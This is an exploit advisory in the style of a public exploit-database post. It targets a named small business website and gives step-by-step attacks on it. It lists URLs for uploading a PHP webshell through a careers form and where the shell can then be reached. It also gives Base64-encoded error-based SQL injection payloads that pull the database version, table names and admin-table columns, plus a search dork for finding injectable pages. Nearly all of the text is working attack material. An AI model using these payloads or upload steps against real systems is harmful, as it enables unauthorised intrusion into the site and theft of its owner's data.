===============================================================
# Title : Sujal Enterprise File Upload Vulnerability
# Author : Dj3Bb4rAn0n (bassem) FB/djebbar.bassem.16
# Date : 08/04/2019
# Home : Annaba ( Algeria )
# Tested on : Linux ( Backbox )
# Vendor : Sujal Enterprise
# Dork :
===============================================================
# PoC :
-----
---------------------------------------------------------------
# [ 1 ] File Upload Vulnerability
# Upload your malicious PHP backdoor or webshell from this link : http://sujalenterprise.in/career.php
# To display the webshell use this link : http://sujalenterprise.in/img/career/[ WEBSHELL NAME ]
-----------------------------------------------------------------
# [ 2 ] Base64 XPath SQL Injection Vulnerability (the id parameter is Base64-encoded; each request below is shown encoded, then decoded)
# Search for any injection point from google using this dork : site:http://sujalenterprise.in .php?id
# Use a single quote as a payload [ ' ]
# Version : http://sujalenterprise.in/product_details.php?id=NjQgICBhbmQgZXh0cmFjdHZhbHVlKDB4MGEsY29uY2F0KDB4MGEsKHNlbGVjdCB2ZXJzaW9uKCkpKSk=
# Decoded : http://sujalenterprise.in/product_details.php?id=64 and extractvalue(0x0a,concat(0x0a,(select version())))
# Tables : http://sujalenterprise.in/product_details.php?id=NjQgICAgYW5kIGV4dHJhY3R2YWx1ZSgweDBhLGNvbmNhdCgweDBhLChzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSkp
# Decoded : http://sujalenterprise.in/product_details.php?id=64 and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit [ Put limit ],1)))
# Columns : http://sujalenterprise.in/product_details.php?id=NjQgICAgIGFuZCBleHRyYWN0dmFsdWUoMHgwYSxjb25jYXQoMHgwYSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPURBVEFCQVNFKCkgYW5kIHRhYmxlX25hbWU9MHg3NDYyNmM1ZjYxNjQ2ZDY5NmUgbGltaXQgMSwxKSkp
# Decoded : http://sujalenterprise.in/product_details.php?id=64 and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x74626c5f61646d696e limit [ Put limit ],1)))